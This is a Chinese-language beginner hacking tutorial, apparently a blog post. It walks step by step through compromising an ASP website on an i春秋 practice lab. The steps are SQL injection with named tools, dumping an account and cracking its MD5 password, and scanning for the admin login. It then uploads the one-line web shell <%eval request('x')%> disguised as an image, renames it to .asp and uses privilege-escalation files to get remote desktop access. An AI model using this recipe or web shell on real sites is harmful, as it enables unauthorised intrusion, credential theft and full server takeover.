首先,大家先跟著我一起背誦三字經。
這是一篇在腳本小子的世界裡流傳的比較廣的滲透三字經,也是拿下一個網站的基本思路。
何為腳本小子?一般來說,我們通常會把以“黑客”自居並沾沾自喜的初學者叫做腳本小子。腳本小子不像真正的黑客那樣發現系統漏洞,他們通常使用別人開發的程序來惡意破壞他人系統。
通常的刻板印象為一位沒有專科經驗的少年,破壞無辜網站企圖使得他的朋友感到驚訝。他們常常從某些網站上覆制腳本代碼,然後到處粘貼,卻並不一定明白他們的方法與原理。他們欽慕於黑客的能力與探索精神,但與黑客所不同的是,腳本小子通常只是對計算機系統有基礎瞭解與愛好,但並不注重程序語言、算法、和數據結構的研究,雖然這些對於真正的黑客來說是必須具備的素質。
今天,小白帶你入門腳本小子。文章開頭一起朗讀的三字經文不知道大家還有沒有印象。一般來說,最簡單的滲透流程就來自這三字經:找注入-爆賬號-找後臺-傳小馬-拿權限。其中,這個流程的每一個階段都有代表性的利用工具,先提前和大家介紹一下。
0x01 找注入 && 0x02 爆賬號
工具:啊D注入工具、椰樹、Pangolin(穿山甲)、havij(胡蘿蔔)
0x03 找後臺
工具:御劍後臺掃描、wwwscan掃描器
0x04 傳小馬
工具:pr提權工具、巴西烤肉提權工具
先不講工具的原理這些廢話,下面開始直接帶你滲透一個網站。
由於小白手上沒有對應的實驗環境,轉戰i春秋,直接利用i春秋網站上提供的環境為大家來演示。
http://www.ichunqiu.com/racing
演示開始
Setup 1 找注入
打開桌面上的火狐瀏覽器,出現如下圖的頁面
什麼都不要想,直接上啊D注入工具
成功找到注入點,如下圖所示。
Setup2 爆賬號
右鍵找到的注入點-注入檢測
點擊右上角的檢測開始注入檢測
最後得到網站的某個賬號,用戶名是linhai,密碼為d7e15730ef9708c0。一般來說,數據庫存放的密碼應該是經過md5加密過的,怎麼破?別慌!
解密MD5網站: http://www.dmd5.com/
解密md5後得到密碼值為linhai19760812
Setup3 找後臺
此步驟為找到網站的管理後臺。來人啊,上工具。
打開後開始掃描
接下來,訪問掃描到的後臺地址,登陸。
地址:http://www.test.ichunqiu/admin/login.asp
直接登陸到網站的後臺,到這裡,是不是內心還伴隨著一點小小的心動呢?
Setup4 傳小馬
由於是asp的站點,確定需要的是asp一句話木馬,代碼為
<%eval request(“x”)%>,密碼為x
小白試了很多的上傳點,比如這裡:
還有這裡
這裡
這裡
但是!!!功夫不負有心人,還是讓我找到了一個上傳點。
於是乎新建一個txt文檔,寫上asp一句話<%eval request(“x”)%>,密碼是x。並且把文件類型改成圖片。也不要只寫一行代碼,不大不小,100行差不多。
然後上傳
接下來的思路就是利用網站的數據庫功能把我們上傳的文件後綴由jpg改成asp
然後,拿出我們的菜刀,連接剛我們複製到根目錄的xbk.asp文件(木馬)
地址是:http://www.test.ichunqiu/xbk.asp,密碼是x。
在空白處 右鍵-添加 ,輸入木馬的地址和網站
Setup5 拿權限
右鍵木馬的地址,選擇 虛擬終端
輸入任意命令,發現沒有權限,訪問被拒絕
接下切換到回收站目錄下,回收站是幾個有限擁有執行權限的目錄。
分別找到我們的提權三件套:cmd.exe、pr.exe、3389.bat
接著,將三件套上傳到回收站目錄下面,如下圖所示。
接下來,進入我們上傳的cmd.exe的虛擬終端,執行我們的提權三件套。
執行完成之後,打遠程連接,進入服務器。
至此,一個完整的滲透過程到此結束。